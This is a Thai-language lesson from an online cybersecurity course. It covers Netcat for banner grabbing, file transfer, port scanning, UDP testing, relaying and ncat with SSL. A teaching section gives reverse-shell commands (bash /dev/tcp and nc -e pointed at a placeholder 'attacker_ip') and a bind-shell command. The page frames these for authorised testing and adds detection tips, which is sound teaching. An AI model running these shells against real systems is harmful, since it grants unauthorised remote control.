0Pricing
Cyber Security Academy · บทเรียน

Netcat: มีดพกสวิสสำหรับเครือข่าย

ใช้ nc สำหรับแบนเนอร์ การถ่ายโอนไฟล์ การส่งต่อพอร์ต และเชลล์ย้อนกลับอย่างง่าย

Netcat: มีดพกสวิสสำหรับเครือข่าย เป็นบทเรียน Cyber Security Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 3 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Cyber Security Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน

เน็ตแคตคืออะไร

เน็ตแคต (เอ็นซี) เป็นเครื่องมือที่อ่านและเขียนข้อมูลผ่านการเชื่อมต่อเครือข่ายโดยใช้ TCP หรือ UDP เครื่องมือนี้ติดตั้งอยู่ในระบบยูนิกซ์เกือบทุกระบบ และมีประโยชน์อย่างยิ่งสำหรับการแก้ไขข้อบกพร่อง การถ่ายโอนไฟล์ และการเจาะระบบเบื้องต้น

การเชื่อมต่อพื้นฐานและการดึงแบนเนอร์

เชื่อมต่อกับพอร์ต TCP ใดก็ได้เพื่อดึงแบนเนอร์บริการและโต้ตอบกับโพรโทคอลด้วยตนเอง นี่คือรูปแบบการสำรวจระบบที่ง่ายที่สุด

# Connect to port 80
nc 192.168.1.100 80
GET / HTTP/1.0
[Enter twice]

# Connect to SMTP
nc mail.example.com 25
# Returns: 220 mail.example.com ESMTP

การรอรับการเชื่อมต่อบนพอร์ต

เน็ตแคตสามารถรอรับการเชื่อมต่อขาเข้าด้วย -l -p ซึ่งมีประโยชน์สำหรับการทดสอบการเชื่อมต่อ การรับเชลล์ย้อนกลับ และการรับไฟล์

# Listen on port 4444
nc -lvnp 4444

# -l listen
# -v verbose
# -n no DNS resolution
# -p port number

การถ่ายโอนไฟล์ด้วยเน็ตแคต

เน็ตแคตสามารถส่งไฟล์โดยส่งข้อมูลเข้าไปในการเชื่อมต่อ ฝั่งรับจะรอรับการเชื่อมต่อและเปลี่ยนเส้นทางผลลัพธ์ไปยังไฟล์ ไม่มีการเข้ารหัส — ควรใช้เฉพาะบนเครือข่ายที่เชื่อถือได้

# Receiver (runs first):
nc -lvnp 4444 > received_file.txt

# Sender:
nc 192.168.1.10 4444 < file_to_send.txt

การสแกนพอร์ตด้วยเน็ตแคต

เน็ตแคตสามารถสแกนพอร์ตพื้นฐานด้วย -z (โหมดที่ไม่มีอินพุต/เอาต์พุต) และ -w (ระยะหมดเวลา) แม้จะช้ากว่าเอ็นแมป แต่มีประโยชน์เมื่อไม่สามารถใช้เอ็นแมปได้

# Scan ports 20-80
nc -zv 192.168.1.100 20-80 2>&1 | grep succeeded

# With timeout:
nc -zvw2 192.168.1.100 22 80 443

เชลล์ย้อนกลับอย่างง่าย

เชลล์ย้อนกลับทำให้เป้าหมายเชื่อมต่อกลับมายังผู้โจมตี มีประโยชน์ในการทดสอบเจาะระบบเมื่อกฎไฟร์วอลล์บล็อกการเชื่อมต่อขาเข้าที่เป้าหมาย

# Attacker listens:
nc -lvnp 4444

# Target executes (bash):
bash -i >& /dev/tcp/attacker_ip/4444 0>&1

# Or via nc:
nc attacker_ip 4444 -e /bin/bash

เชลล์แบบรอรับการเชื่อมต่อ

เชลล์แบบนี้จะรอรับการเชื่อมต่ออยู่บนเครื่องเป้าหมาย จากนั้นผู้โจมตีจะเชื่อมต่อเข้ามา พบได้น้อยกว่าในการทดสอบเจาะระบบสมัยใหม่ เนื่องจากไฟร์วอลล์มักบล็อกการเชื่อมต่อขาเข้า

# On target: listen and serve a shell
nc -lvnp 5555 -e /bin/bash

# On attacker: connect
nc target_ip 5555

โหมด UDP

ใช้ -u สำหรับการเชื่อมต่อ UDP ซึ่งมีประโยชน์สำหรับการทดสอบบริการ UDP เช่น DNS (พอร์ต 53) และ SNMP (พอร์ต 161)

# Test DNS over UDP
nc -u 8.8.8.8 53

# Test SNMP
nc -u 192.168.1.1 161

การทำพร็อกซีด้วยเน็ตแคต

เน็ตแคตสามารถเชื่อมต่อเป็นทอด ๆ เพื่อเปลี่ยนเส้นทางผ่านเครือข่ายต่าง ๆ เมื่อใช้ร่วมกับไพพ์ที่มีชื่อ (mkfifo) จะสร้างอุโมงค์สื่อสารสองทางอย่างง่ายได้โดยไม่ต้องใช้เครื่องมือเพิ่มเติม

mkfifo /tmp/pipe
nc -lvnp 4445 < /tmp/pipe | nc internal_host 80 > /tmp/pipe

เอ็นแคต: ทางเลือกสมัยใหม่

เอ็นแคต (ส่วนหนึ่งของเอ็นแมป) ขยายความสามารถของเน็ตแคตด้วยการรองรับ SSL (--ssl) การควบคุมการเข้าถึง และโหมดตัวกลาง ควรเลือกใช้เอ็นแคตสำหรับช่องทางที่เข้ารหัส

# SSL listener
ncat --ssl -lvnp 4444

# SSL connect
ncat --ssl target_ip 4444

สำหรับผู้ป้องกัน: การตรวจจับเน็ตแคต

การเชื่อมต่อของเน็ตแคตดูเหมือนการเชื่อมต่อ TCP ทั่วไป ผู้ป้องกันสามารถตรวจจับได้จากการเฝ้าติดตามชื่อโพรเซส พอร์ตขาออกที่ผิดปกติ และเชลล์ที่ถูกสร้างจากโพรเซสแม่ที่ไม่คาดคิด

ตรวจสอบความเข้าใจอย่างรวดเร็ว

แฟล็กใดของเน็ตแคตที่เปิดใช้โหมดรอรับการเชื่อมต่อ

สรุป: เน็ตแคต

เน็ตแคตเป็นเครื่องมือพื้นฐานที่สำคัญ ใช้สำหรับดึงแบนเนอร์ ถ่ายโอนไฟล์ ทดสอบการเชื่อมต่อ และทำความเข้าใจกลไกของเชลล์ย้อนกลับและเชลล์แบบรอรับการเชื่อมต่อ ในการทดสอบเจาะระบบที่ได้รับอนุญาต เครื่องมือนี้ใช้ตรวจสอบกฎไฟร์วอลล์และจำลองการเปลี่ยนเส้นทางของผู้โจมตี ควรรู้จักเครื่องมือนี้เป็นอย่างดี ทั้งเพื่อใช้งานและตรวจจับการใช้งาน

คำถามที่พบบ่อย

บทเรียน “Netcat: มีดพกสวิสสำหรับเครือข่าย” ฟรีหรือไม่

ใช่ — ข้อความเต็มของ “Netcat: มีดพกสวิสสำหรับเครือข่าย” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Cyber Security Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน

คุณจะเรียนรู้อะไรในบทเรียน “Netcat: มีดพกสวิสสำหรับเครือข่าย”

ใช้ nc สำหรับแบนเนอร์ การถ่ายโอนไฟล์ การส่งต่อพอร์ต และเชลล์ย้อนกลับอย่างง่าย คุณปฏิบัติ Cyber Security Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน

คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Cyber Security Academy หรือไม่

ไม่จำเป็นต้องมีประสบการณ์มาก่อน Cyber Security Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 3 จากทั้งหมด 4 บทเรียน

บทเรียน “Netcat: มีดพกสวิสสำหรับเครือข่าย” ใช้เวลานานแค่ไหน

บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย

ฉันเขียนและรันโค้ดในบทเรียน Cyber Security Academy นี้ได้ไหม

ได้ บทเรียน Cyber Security Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ

บทเรียนทั้งหมดในหลักสูตรนี้

  1. เทคนิคการสแกนพอร์ตด้วย Nmap
  2. การระบุลักษณะบริการและระบบปฏิบัติการ
  3. Netcat: มีดพกสวิสสำหรับเครือข่าย
  4. การเขียนสคริปต์แจกแจงเครือข่าย
← กลับไปที่ Cyber Security Academy